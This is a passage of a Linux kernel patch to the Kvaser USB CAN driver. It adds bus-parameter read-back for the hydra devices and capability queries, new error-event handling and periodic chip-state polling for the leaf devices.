+ /* Minihydra command IDs */
+ #define CMD_SET_BUSPARAMS_REQ			16
++#define CMD_GET_BUSPARAMS_REQ			17
++#define CMD_GET_BUSPARAMS_RESP			18
+ #define CMD_GET_CHIP_STATE_REQ			19
+ #define CMD_CHIP_STATE_EVENT			20
+ #define CMD_SET_DRIVERMODE_REQ			21
+@@ -196,21 +198,26 @@ struct kvaser_cmd_chip_state_event {
+ #define KVASER_USB_HYDRA_BUS_MODE_CANFD_ISO	0x01
+ #define KVASER_USB_HYDRA_BUS_MODE_NONISO	0x02
+ struct kvaser_cmd_set_busparams {
+-	__le32 bitrate;
+-	u8 tseg1;
+-	u8 tseg2;
+-	u8 sjw;
+-	u8 nsamples;
++	struct kvaser_usb_busparams busparams_nominal;
+ 	u8 reserved0[4];
+-	__le32 bitrate_d;
+-	u8 tseg1_d;
+-	u8 tseg2_d;
+-	u8 sjw_d;
+-	u8 nsamples_d;
++	struct kvaser_usb_busparams busparams_data;
+ 	u8 canfd_mode;
+ 	u8 reserved1[7];
+ } __packed;
+ 
++/* Busparam type */
++#define KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN	0x00
++#define KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD	0x01
++struct kvaser_cmd_get_busparams_req {
++	u8 type;
++	u8 reserved[27];
++} __packed;
++
++struct kvaser_cmd_get_busparams_res {
++	struct kvaser_usb_busparams busparams;
++	u8 reserved[20];
++} __packed;
++
+ /* Ctrl modes */
+ #define KVASER_USB_HYDRA_CTRLMODE_NORMAL	0x01
+ #define KVASER_USB_HYDRA_CTRLMODE_LISTEN	0x02
+@@ -281,6 +288,8 @@ struct kvaser_cmd {
+ 		struct kvaser_cmd_error_event error_event;
+ 
+ 		struct kvaser_cmd_set_busparams set_busparams_req;
++		struct kvaser_cmd_get_busparams_req get_busparams_req;
++		struct kvaser_cmd_get_busparams_res get_busparams_res;
+ 
+ 		struct kvaser_cmd_chip_state_event chip_state_event;
+ 
+@@ -363,6 +372,10 @@ struct kvaser_cmd_ext {
+ 	} __packed;
+ } __packed;
+ 
++struct kvaser_usb_net_hydra_priv {
++	int pending_get_busparams_type;
++};
++
+ static const struct can_bittiming_const kvaser_usb_hydra_kcan_bittiming_c = {
+ 	.name = "kvaser_usb_kcan",
+ 	.tseg1_min = 1,
+@@ -840,6 +853,39 @@ static void kvaser_usb_hydra_flush_queue_reply(const struct kvaser_usb *dev,
+ 	complete(&priv->flush_comp);
+ }
+ 
++static void kvaser_usb_hydra_get_busparams_reply(const struct kvaser_usb *dev,
++						 const struct kvaser_cmd *cmd)
++{
++	struct kvaser_usb_net_priv *priv;
++	struct kvaser_usb_net_hydra_priv *hydra;
++
++	priv = kvaser_usb_hydra_net_priv_from_cmd(dev, cmd);
++	if (!priv)
++		return;
++
++	hydra = priv->sub_priv;
++	if (!hydra)
++		return;
++
++	switch (hydra->pending_get_busparams_type) {
++	case KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN:
++		memcpy(&priv->busparams_nominal, &cmd->get_busparams_res.busparams,
++		       sizeof(priv->busparams_nominal));
++		break;
++	case KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD:
++		memcpy(&priv->busparams_data, &cmd->get_busparams_res.busparams,
++		       sizeof(priv->busparams_nominal));
++		break;
++	default:
++		dev_warn(&dev->intf->dev, "Unknown get_busparams_type %d\n",
++			 hydra->pending_get_busparams_type);
++		break;
++	}
++	hydra->pending_get_busparams_type = -1;
++
++	complete(&priv->get_busparams_comp);
++}
++
+ static void
+ kvaser_usb_hydra_bus_status_to_can_state(const struct kvaser_usb_net_priv *priv,
+ 					 u8 bus_status,
+@@ -1326,6 +1372,10 @@ static void kvaser_usb_hydra_handle_cmd_std(const struct kvaser_usb *dev,
+ 		kvaser_usb_hydra_state_event(dev, cmd);
+ 		break;
+ 
++	case CMD_GET_BUSPARAMS_RESP:
++		kvaser_usb_hydra_get_busparams_reply(dev, cmd);
++		break;
++
+ 	case CMD_ERROR_EVENT:
+ 		kvaser_usb_hydra_error_event(dev, cmd);
+ 		break;
+@@ -1522,15 +1572,58 @@ static int kvaser_usb_hydra_set_mode(struct net_device *netdev,
+ 	return err;
+ }
+ 
+-static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
++static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
++					  int busparams_type)
++{
++	struct kvaser_usb *dev = priv->dev;
++	struct kvaser_usb_net_hydra_priv *hydra = priv->sub_priv;
++	struct kvaser_cmd *cmd;
++	int err;
++
++	if (!hydra)
++		return -EINVAL;
++
++	cmd = kcalloc(1, sizeof(struct kvaser_cmd), GFP_KERNEL);
++	if (!cmd)
++		return -ENOMEM;
++
++	cmd->header.cmd_no = CMD_GET_BUSPARAMS_REQ;
++	kvaser_usb_hydra_set_cmd_dest_he
++		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
++	kvaser_usb_hydra_set_cmd_transid
++				(cmd, kvaser_usb_hydra_get_next_transid(dev));
++	cmd->get_busparams_req.type = busparams_type;
++	hydra->pending_get_busparams_type = busparams_type;
++
++	reinit_completion(&priv->get_busparams_comp);
++
++	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	if (err)
++		return err;
++
++	if (!wait_for_completion_timeout(&priv->get_busparams_comp,
++					 msecs_to_jiffies(KVASER_USB_TIMEOUT)))
++		return -ETIMEDOUT;
++
++	return err;
++}
++
++static int kvaser_usb_hydra_get_nominal_busparams(struct kvaser_usb_net_priv *priv)
++{
++	return kvaser_usb_hydra_get_busparams(priv, KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN);
++}
++
++static int kvaser_usb_hydra_get_data_busparams(struct kvaser_usb_net_priv *priv)
++{
++	return kvaser_usb_hydra_get_busparams(priv, KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD);
++}
++
++static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
++					  const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *bt = &priv->can.bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+-	int tseg1 = bt->prop_seg + bt->phase_seg1;
+-	int tseg2 = bt->phase_seg2;
+-	int sjw = bt->sjw;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1538,11 +1631,8 @@ static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_REQ;
+-	cmd->set_busparams_req.bitrate = cpu_to_le32(bt->bitrate);
+-	cmd->set_busparams_req.sjw = (u8)sjw;
+-	cmd->set_busparams_req.tseg1 = (u8)tseg1;
+-	cmd->set_busparams_req.tseg2 = (u8)tseg2;
+-	cmd->set_busparams_req.nsamples = 1;
++	memcpy(&cmd->set_busparams_req.busparams_nominal, busparams,
++	       sizeof(cmd->set_busparams_req.busparams_nominal));
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+@@ -1556,15 +1646,12 @@ static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
+ 	return err;
+ }
+ 
+-static int kvaser_usb_hydra_set_data_bittiming(struct net_device *netdev)
++static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
++					       const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *dbt = &priv->can.data_bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+-	int tseg1 = dbt->prop_seg + dbt->phase_seg1;
+-	int tseg2 = dbt->phase_seg2;
+-	int sjw = dbt->sjw;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1572,11 +1659,8 @@ static int kvaser_usb_hydra_set_data_bittiming(struct net_device *netdev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_FD_REQ;
+-	cmd->set_busparams_req.bitrate_d = cpu_to_le32(dbt->bitrate);
+-	cmd->set_busparams_req.sjw_d = (u8)sjw;
+-	cmd->set_busparams_req.tseg1_d = (u8)tseg1;
+-	cmd->set_busparams_req.tseg2_d = (u8)tseg2;
+-	cmd->set_busparams_req.nsamples_d = 1;
++	memcpy(&cmd->set_busparams_req.busparams_data, busparams,
++	       sizeof(cmd->set_busparams_req.busparams_data));
+ 
+ 	if (priv->can.ctrlmode & CAN_CTRLMODE_FD) {
+ 		if (priv->can.ctrlmode & CAN_CTRLMODE_FD_NON_ISO)
+@@ -1683,6 +1767,19 @@ static int kvaser_usb_hydra_init_card(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_hydra_init_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_hydra_priv *hydra;
++
++	hydra = devm_kzalloc(&priv->dev->intf->dev, sizeof(*hydra), GFP_KERNEL);
++	if (!hydra)
++		return -ENOMEM;
++
++	priv->sub_priv = hydra;
++
++	return 0;
++}
++
+ static int kvaser_usb_hydra_get_software_info(struct kvaser_usb *dev)
+ {
+ 	struct kvaser_cmd cmd;
+@@ -2027,10 +2124,13 @@ kvaser_usb_hydra_frame_to_cmd(const struct kvaser_usb_net_priv *priv,
+ const struct kvaser_usb_dev_ops kvaser_usb_hydra_dev_ops = {
+ 	.dev_set_mode = kvaser_usb_hydra_set_mode,
+ 	.dev_set_bittiming = kvaser_usb_hydra_set_bittiming,
++	.dev_get_busparams = kvaser_usb_hydra_get_nominal_busparams,
+ 	.dev_set_data_bittiming = kvaser_usb_hydra_set_data_bittiming,
++	.dev_get_data_busparams = kvaser_usb_hydra_get_data_busparams,
+ 	.dev_get_berr_counter = kvaser_usb_hydra_get_berr_counter,
+ 	.dev_setup_endpoints = kvaser_usb_hydra_setup_endpoints,
+ 	.dev_init_card = kvaser_usb_hydra_init_card,
++	.dev_init_channel = kvaser_usb_hydra_init_channel,
+ 	.dev_get_software_info = kvaser_usb_hydra_get_software_info,
+ 	.dev_get_software_details = kvaser_usb_hydra_get_software_details,
+ 	.dev_get_card_info = kvaser_usb_hydra_get_card_info,
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
+index 19958037720f4..b423fd4c79890 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
+@@ -21,6 +21,7 @@
+ #include <linux/types.h>
+ #include <linux/units.h>
+ #include <linux/usb.h>
++#include <linux/workqueue.h>
+ 
+ #include <linux/can.h>
+ #include <linux/can/dev.h>
+@@ -56,6 +57,9 @@
+ #define CMD_RX_EXT_MESSAGE		14
+ #define CMD_TX_EXT_MESSAGE		15
+ #define CMD_SET_BUS_PARAMS		16
++#define CMD_GET_BUS_PARAMS		17
++#define CMD_GET_BUS_PARAMS_REPLY	18
++#define CMD_GET_CHIP_STATE		19
+ #define CMD_CHIP_STATE_EVENT		20
+ #define CMD_SET_CTRL_MODE		21
+ #define CMD_RESET_CHIP			24
+@@ -70,10 +74,13 @@
+ #define CMD_GET_CARD_INFO_REPLY		35
+ #define CMD_GET_SOFTWARE_INFO		38
+ #define CMD_GET_SOFTWARE_INFO_REPLY	39
++#define CMD_ERROR_EVENT			45
+ #define CMD_FLUSH_QUEUE			48
+ #define CMD_TX_ACKNOWLEDGE		50
+ #define CMD_CAN_ERROR_EVENT		51
+ #define CMD_FLUSH_QUEUE_REPLY		68
++#define CMD_GET_CAPABILITIES_REQ	95
++#define CMD_GET_CAPABILITIES_RESP	96
+ 
+ #define CMD_LEAF_LOG_MESSAGE		106
+ 
+@@ -83,6 +90,8 @@
+ #define KVASER_USB_LEAF_SWOPTION_FREQ_32_MHZ_CLK BIT(5)
+ #define KVASER_USB_LEAF_SWOPTION_FREQ_24_MHZ_CLK BIT(6)
+ 
++#define KVASER_USB_LEAF_SWOPTION_EXT_CAP BIT(12)
++
+ /* error factors */
+ #define M16C_EF_ACKE			BIT(0)
+ #define M16C_EF_CRCE			BIT(1)
+@@ -157,11 +166,7 @@ struct usbcan_cmd_softinfo {
+ struct kvaser_cmd_busparams {
+ 	u8 tid;
+ 	u8 channel;
+-	__le32 bitrate;
+-	u8 tseg1;
+-	u8 tseg2;
+-	u8 sjw;
+-	u8 no_samp;
++	struct kvaser_usb_busparams busparams;
+ } __packed;
+ 
+ struct kvaser_cmd_tx_can {
+@@ -230,7 +235,7 @@ struct kvaser_cmd_tx_acknowledge_header {
+ 	u8 tid;
+ } __packed;
+ 
+-struct leaf_cmd_error_event {
++struct leaf_cmd_can_error_event {
+ 	u8 tid;
+ 	u8 flags;
+ 	__le16 time[3];
+@@ -242,7 +247,7 @@ struct leaf_cmd_error_event {
+ 	u8 error_factor;
+ } __packed;
+ 
+-struct usbcan_cmd_error_event {
++struct usbcan_cmd_can_error_event {
+ 	u8 tid;
+ 	u8 padding;
+ 	u8 tx_errors_count_ch0;
+@@ -254,6 +259,28 @@ struct usbcan_cmd_error_event {
+ 	__le16 time;
+ } __packed;
+ 
++/* CMD_ERROR_EVENT error codes */
++#define KVASER_USB_LEAF_ERROR_EVENT_TX_QUEUE_FULL 0x8
++#define KVASER_USB_LEAF_ERROR_EVENT_PARAM 0x9
++
++struct leaf_cmd_error_event {
++	u8 tid;
++	u8 error_code;
++	__le16 timestamp[3];
++	__le16 padding;
++	__le16 info1;
++	__le16 info2;
++} __packed;
++
++struct usbcan_cmd_error_event {
++	u8 tid;
++	u8 error_code;
++	__le16 info1;
++	__le16 info2;
++	__le16 timestamp;
++	__le16 padding;
++} __packed;
++
+ struct kvaser_cmd_ctrl_mode {
+ 	u8 tid;
+ 	u8 channel;
+@@ -278,6 +305,28 @@ struct leaf_cmd_log_message {
+ 	u8 data[8];
+ } __packed;
+ 
++/* Sub commands for cap_req and cap_res */
++#define KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE 0x02
++#define KVASER_USB_LEAF_CAP_CMD_ERR_REPORT 0x05
++struct kvaser_cmd_cap_req {
++	__le16 padding0;
++	__le16 cap_cmd;
++	__le16 padding1;
++	__le16 channel;
++} __packed;
++
++/* Status codes for cap_res */
++#define KVASER_USB_LEAF_CAP_STAT_OK 0x00
++#define KVASER_USB_LEAF_CAP_STAT_NOT_IMPL 0x01
++#define KVASER_USB_LEAF_CAP_STAT_UNAVAIL 0x02
++struct kvaser_cmd_cap_res {
++	__le16 padding;
++	__le16 cap_cmd;
++	__le16 status;
++	__le32 mask;
++	__le32 value;
++} __packed;
++
+ struct kvaser_cmd {
+ 	u8 len;
+ 	u8 id;
+@@ -293,14 +342,18 @@ struct kvaser_cmd {
+ 			struct leaf_cmd_softinfo softinfo;
+ 			struct leaf_cmd_rx_can rx_can;
+ 			struct leaf_cmd_chip_state_event chip_state_event;
+-			struct leaf_cmd_error_event error_event;
++			struct leaf_cmd_can_error_event can_error_event;
+ 			struct leaf_cmd_log_message log_message;
++			struct leaf_cmd_error_event error_event;
++			struct kvaser_cmd_cap_req cap_req;
++			struct kvaser_cmd_cap_res cap_res;
+ 		} __packed leaf;
+ 
+ 		union {
+ 			struct usbcan_cmd_softinfo softinfo;
+ 			struct usbcan_cmd_rx_can rx_can;
+ 			struct usbcan_cmd_chip_state_event chip_state_event;
++			struct usbcan_cmd_can_error_event can_error_event;
+ 			struct usbcan_cmd_error_event error_event;
+ 		} __packed usbcan;
+ 
+@@ -323,7 +376,10 @@ static const u8 kvaser_usb_leaf_cmd_sizes_leaf[] = {
+ 	[CMD_RX_EXT_MESSAGE]		= kvaser_fsize(u.leaf.rx_can),
+ 	[CMD_LEAF_LOG_MESSAGE]		= kvaser_fsize(u.leaf.log_message),
+ 	[CMD_CHIP_STATE_EVENT]		= kvaser_fsize(u.leaf.chip_state_event),
+-	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.leaf.error_event),
++	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.leaf.can_error_event),
++	[CMD_GET_CAPABILITIES_RESP]	= kvaser_fsize(u.leaf.cap_res),
++	[CMD_GET_BUS_PARAMS_REPLY]	= kvaser_fsize(u.busparams),
++	[CMD_ERROR_EVENT]		= kvaser_fsize(u.leaf.error_event),
+ 	/* ignored events: */
+ 	[CMD_FLUSH_QUEUE_REPLY]		= CMD_SIZE_ANY,
+ };
+@@ -337,7 +393,8 @@ static const u8 kvaser_usb_leaf_cmd_sizes_usbcan[] = {
+ 	[CMD_RX_STD_MESSAGE]		= kvaser_fsize(u.usbcan.rx_can),
+ 	[CMD_RX_EXT_MESSAGE]		= kvaser_fsize(u.usbcan.rx_can),
+ 	[CMD_CHIP_STATE_EVENT]		= kvaser_fsize(u.usbcan.chip_state_event),
+-	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.usbcan.error_event),
++	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.usbcan.can_error_event),
++	[CMD_ERROR_EVENT]		= kvaser_fsize(u.usbcan.error_event),
+ 	/* ignored events: */
+ 	[CMD_USBCAN_CLOCK_OVERFLOW_EVENT] = CMD_SIZE_ANY,
+ };
+@@ -365,6 +422,12 @@ struct kvaser_usb_err_summary {
+ 	};
+ };
+ 
++struct kvaser_usb_net_leaf_priv {
++	struct kvaser_usb_net_priv *net;
++
++	struct delayed_work chip_state_req_work;
++};
++
+ static const struct can_bittiming_const kvaser_usb_leaf_m16c_bittiming_const = {
+ 	.name = "kvaser_usb_ucii",
+ 	.tseg1_min = 4,
+@@ -606,6 +669,9 @@ static void kvaser_usb_leaf_get_software_info_leaf(struct kvaser_usb *dev,
+ 	dev->fw_version = le32_to_cpu(softinfo->fw_version);
+ 	dev->max_tx_urbs = le16_to_cpu(softinfo->max_outstanding_tx);
+ 
++	if (sw_options & KVASER_USB_LEAF_SWOPTION_EXT_CAP)
++		dev->card_data.capabilities |= KVASER_USB_CAP_EXT_CAP;
++
+ 	if (dev->driver_info->quirks & KVASER_USB_QUIRK_IGNORE_CLK_FREQ) {
+ 		/* Firmware expects bittiming parameters calculated for 16MHz
+ 		 * clock, regardless of the actual clock
+@@ -693,6 +759,116 @@ static int kvaser_usb_leaf_get_card_info(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_leaf_get_single_capability(struct kvaser_usb *dev,
++						 u16 cap_cmd_req, u16 *status)
++{
++	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
++	struct kvaser_cmd *cmd;
++	u32 value = 0;
++	u32 mask = 0;
++	u16 cap_cmd_res;
++	int err;
++	int i;
++
++	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
++	if (!cmd)
++		return -ENOMEM;
++
++	cmd->id = CMD_GET_CAPABILITIES_REQ;
++	cmd->u.leaf.cap_req.cap_cmd = cpu_to_le16(cap_cmd_req);
++	cmd->len = CMD_HEADER_LEN + sizeof(struct kvaser_cmd_cap_req);
++
++	err = kvaser_usb_send_cmd(dev, cmd, cmd->len);
++	if (err)
++		goto end;
++
++	err = kvaser_usb_leaf_wait_cmd(dev, CMD_GET_CAPABILITIES_RESP, cmd);
++	if (err)
++		goto end;
++
++	*status = le16_to_cpu(cmd->u.leaf.cap_res.status);
++
++	if (*status != KVASER_USB_LEAF_CAP_STAT_OK)
++		goto end;
++
++	cap_cmd_res = le16_to_cpu(cmd->u.leaf.cap_res.cap_cmd);
++	switch (cap_cmd_res) {
++	case KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE:
++	case KVASER_USB_LEAF_CAP_CMD_ERR_REPORT:
++		value = le32_to_cpu(cmd->u.leaf.cap_res.value);
++		mask = le32_to_cpu(cmd->u.leaf.cap_res.mask);
++		break;
++	default:
++		dev_warn(&dev->intf->dev, "Unknown capability command %u\n",
++			 cap_cmd_res);
++		break;
++	}
++
++	for (i = 0; i < dev->nchannels; i++) {
++		if (BIT(i) & (value & mask)) {
++			switch (cap_cmd_res) {
++			case KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE:
++				card_data->ctrlmode_supported |=
++						CAN_CTRLMODE_LISTENONLY;
++				break;
++			case KVASER_USB_LEAF_CAP_CMD_ERR_REPORT:
++				card_data->capabilities |=
++						KVASER_USB_CAP_BERR_CAP;
++				break;
++			}
++		}
++	}
++
++end:
++	kfree(cmd);
++
++	return err;
++}
++
++static int kvaser_usb_leaf_get_capabilities_leaf(struct kvaser_usb *dev)
++{
++	int err;
++	u16 status;
++
++	if (!(dev->card_data.capabilities & KVASER_USB_CAP_EXT_CAP)) {
++		dev_info(&dev->intf->dev,
++			 "No extended capability support. Upgrade device firmware.\n");
++		return 0;
++	}
++
++	err = kvaser_usb_leaf_get_single_capability(dev,
++						    KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE,
++						    &status);
++	if (err)
++		return err;
++	if (status)
++		dev_info(&dev->intf->dev,
++			 "KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE failed %u\n",
++			 status);
++
++	err = kvaser_usb_leaf_get_single_capability(dev,
++						    KVASER_USB_LEAF_CAP_CMD_ERR_REPORT,
++						    &status);
++	if (err)
++		return err;
++	if (status)
++		dev_info(&dev->intf->dev,
++			 "KVASER_USB_LEAF_CAP_CMD_ERR_REPORT failed %u\n",
++			 status);
++
++	return 0;
++}
++
++static int kvaser_usb_leaf_get_capabilities(struct kvaser_usb *dev)
++{
++	int err = 0;
++
++	if (dev->driver_info->family == KVASER_LEAF)
++		err = kvaser_usb_leaf_get_capabilities_leaf(dev);
++
++	return err;
++}
++
+ static void kvaser_usb_leaf_tx_acknowledge(const struct kvaser_usb *dev,
+ 					   const struct kvaser_cmd *cmd)
+ {
+@@ -721,7 +897,7 @@ static void kvaser_usb_leaf_tx_acknowledge(const struct kvaser_usb *dev,
+ 	context = &priv->tx_contexts[tid % dev->max_tx_urbs];
+ 
+ 	/* Sometimes the state change doesn't come after a bus-off event */
+-	if (priv->can.restart_ms && priv->can.state >= CAN_STATE_BUS_OFF) {
++	if (priv->can.restart_ms && priv->can.state == CAN_STATE_BUS_OFF) {
+ 		struct sk_buff *skb;
+ 		struct can_frame *cf;
+ 
+@@ -774,6 +950,16 @@ static int kvaser_usb_leaf_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ 	return err;
+ }
+ 
++static void kvaser_usb_leaf_chip_state_req_work(struct work_struct *work)
++{
++	struct kvaser_usb_net_leaf_priv *leaf =
++		container_of(work, struct kvaser_usb_net_leaf_priv,
++			     chip_state_req_work.work);
++	struct kvaser_usb_net_priv *priv = leaf->net;
++
++	kvaser_usb_leaf_simple_cmd_async(priv, CMD_GET_CHIP_STATE);
++}
++
+ static void
+ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 					const struct kvaser_usb_err_summary *es,
+@@ -792,20 +978,16 @@ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 		new_state = CAN_STATE_BUS_OFF;
+ 	} else if (es->status & M16C_STATE_BUS_PASSIVE) {
+ 		new_state = CAN_STATE_ERROR_PASSIVE;
+-	} else if (es->status & M16C_STATE_BUS_ERROR) {
++	} else if ((es->status & M16C_STATE_BUS_ERROR) &&
++		   cur_state >= CAN_STATE_BUS_OFF) {
+ 		/* Guard against spurious error events after a busoff */
+-		if (cur_state < CAN_STATE_BUS_OFF) {
+-			if (es->txerr >= 128 || es->rxerr >= 128)
+-				new_state = CAN_STATE_ERROR_PASSIVE;
+-			else if (es->txerr >= 96 || es->rxerr >= 96)
+-				new_state = CAN_STATE_ERROR_WARNING;
+-			else if (cur_state > CAN_STATE_ERROR_ACTIVE)
+-				new_state = CAN_STATE_ERROR_ACTIVE;
+-		}
+-	}
+-
+-	if (!es->status)
++	} else if (es->txerr >= 128 || es->rxerr >= 128) {
++		new_state = CAN_STATE_ERROR_PASSIVE;
++	} else if (es->txerr >= 96 || es->rxerr >= 96) {
++		new_state = CAN_STATE_ERROR_WARNING;
++	} else {
+ 		new_state = CAN_STATE_ERROR_ACTIVE;
++	}
+ 
+ 	if (new_state != cur_state) {
+ 		tx_state = (es->txerr >= es->rxerr) ? new_state : 0;
+@@ -815,7 +997,7 @@ kvaser_usb_leaf_rx_error_update_can_state(struct kvaser_usb_net_priv *priv,
+ 	}
+ 
+ 	if (priv->can.restart_ms &&
+-	    cur_state >= CAN_STATE_BUS_OFF &&
++	    cur_state == CAN_STATE_BUS_OFF &&
+ 	    new_state < CAN_STATE_BUS_OFF)
+ 		priv->can.can_stats.restarts++;
+ 
+@@ -849,6 +1031,7 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	struct sk_buff *skb;
+ 	struct net_device_stats *stats;
+ 	struct kvaser_usb_net_priv *priv;
++	struct kvaser_usb_net_leaf_priv *leaf;
+ 	enum can_state old_state, new_state;
+ 
+ 	if (es->channel >= dev->nchannels) {
+@@ -858,8 +1041,13 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	}
+ 
+ 	priv = dev->nets[es->channel];
++	leaf = priv->sub_priv;
+ 	stats = &priv->netdev->stats;
+ 
++	/* Ignore e.g. state change to bus-off reported just after stopping */
++	if (!netif_running(priv->netdev))
++		return;
++
+ 	/* Update all of the CAN interface's state and error counters before
+ 	 * trying any memory allocation that can actually fail with -ENOMEM.
+ 	 *
+@@ -874,6 +1062,14 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 	kvaser_usb_leaf_rx_error_update_can_state(priv, es, &tmp_cf);
+ 	new_state = priv->can.state;
+ 
++	/* If there are errors, request status updates periodically as we do
++	 * not get automatic notifications of improved state.
++	 */
++	if (new_state < CAN_STATE_BUS_OFF &&
++	    (es->rxerr || es->txerr || new_state == CAN_STATE_ERROR_PASSIVE))
++		schedule_delayed_work(&leaf->chip_state_req_work,
++				      msecs_to_jiffies(500));
++
+ 	skb = alloc_can_err_skb(priv->netdev, &cf);
+ 	if (!skb) {
+ 		stats->rx_dropped++;
+@@ -891,7 +1087,7 @@ static void kvaser_usb_leaf_rx_error(const struct kvaser_usb *dev,
+ 		}
+ 
+ 		if (priv->can.restart_ms &&
+-		    old_state >= CAN_STATE_BUS_OFF &&
++		    old_state == CAN_STATE_BUS_OFF &&
+ 		    new_state < CAN_STATE_BUS_OFF) {
+ 			cf->can_id |= CAN_ERR_RESTARTED;
+ 			netif_carrier_on(priv->netdev);
+@@ -990,11 +1186,11 @@ static void kvaser_usb_leaf_usbcan_rx_error(const struct kvaser_usb *dev,
+ 
+ 	case CMD_CAN_ERROR_EVENT:
+ 		es.channel = 0;
+-		es.status = cmd->u.usbcan.error_event.status_ch0;
+-		es.txerr = cmd->u.usbcan.error_event.tx_errors_count_ch0;
+-		es.rxerr = cmd->u.usbcan.error_event.rx_errors_count_ch0;
++		es.status = cmd->u.usbcan.can_error_event.status_ch0;
++		es.txerr = cmd->u.usbcan.can_error_event.tx_errors_count_ch0;
++		es.rxerr = cmd->u.usbcan.can_error_event.rx_errors_count_ch0;
+ 		es.usbcan.other_ch_status =
+-			cmd->u.usbcan.error_event.status_ch1;
++			cmd->u.usbcan.can_error_event.status_ch1;
+ 		kvaser_usb_leaf_usbcan_conditionally_rx_error(dev, &es);
+ 
+ 		/* The USBCAN firmware supports up to 2 channels.
+@@ -1002,13 +1198,13 @@ static void kvaser_usb_leaf_usbcan_rx_error(const struct kvaser_usb *dev,
+ 		 */
+ 		if (dev->nchannels == MAX_USBCAN_NET_DEVICES) {
+ 			es.channel = 1;
+-			es.status = cmd->u.usbcan.error_event.status_ch1;
++			es.status = cmd->u.usbcan.can_error_event.status_ch1;
+ 			es.txerr =
+-				cmd->u.usbcan.error_event.tx_errors_count_ch1;
++				cmd->u.usbcan.can_error_event.tx_errors_count_ch1;
+ 			es.rxerr =
+-				cmd->u.usbcan.error_event.rx_errors_count_ch1;
++				cmd->u.usbcan.can_error_event.rx_errors_count_ch1;
+ 			es.usbcan.other_ch_status =
+-				cmd->u.usbcan.error_event.status_ch0;
++				cmd->u.usbcan.can_error_event.status_ch0;
+ 			kvaser_usb_leaf_usbcan_conditionally_rx_error(dev, &es);
+ 		}
+ 		break;
+@@ -1025,11 +1221,11 @@ static void kvaser_usb_leaf_leaf_rx_error(const struct kvaser_usb *dev,
+ 
+ 	switch (cmd->id) {
+ 	case CMD_CAN_ERROR_EVENT:
+-		es.channel = cmd->u.leaf.error_event.channel;
+-		es.status = cmd->u.leaf.error_event.status;
+-		es.txerr = cmd->u.leaf.error_event.tx_errors_count;
+-		es.rxerr = cmd->u.leaf.error_event.rx_errors_count;
+-		es.leaf.error_factor = cmd->u.leaf.error_event.error_factor;
++		es.channel = cmd->u.leaf.can_error_event.channel;
++		es.status = cmd->u.leaf.can_error_event.status;
++		es.txerr = cmd->u.leaf.can_error_event.tx_errors_count;
++		es.rxerr = cmd->u.leaf.can_error_event.rx_errors_count;
++		es.leaf.error_factor = cmd->u.leaf.can_error_event.error_factor;
+ 		break;
+ 	case CMD_LEAF_LOG_MESSAGE:
+ 		es.channel = cmd->u.leaf.log_message.channel;
+@@ -1162,6 +1358,74 @@ static void kvaser_usb_leaf_rx_can_msg(const struct kvaser_usb *dev,
+ 	netif_rx(skb);
+ }
+ 
++static void kvaser_usb_leaf_error_event_parameter(const struct kvaser_usb *dev,
++						  const struct kvaser_cmd *cmd)
++{
++	u16 info1 = 0;
++
++	switch (dev->driver_info->family) {
++	case KVASER_LEAF:
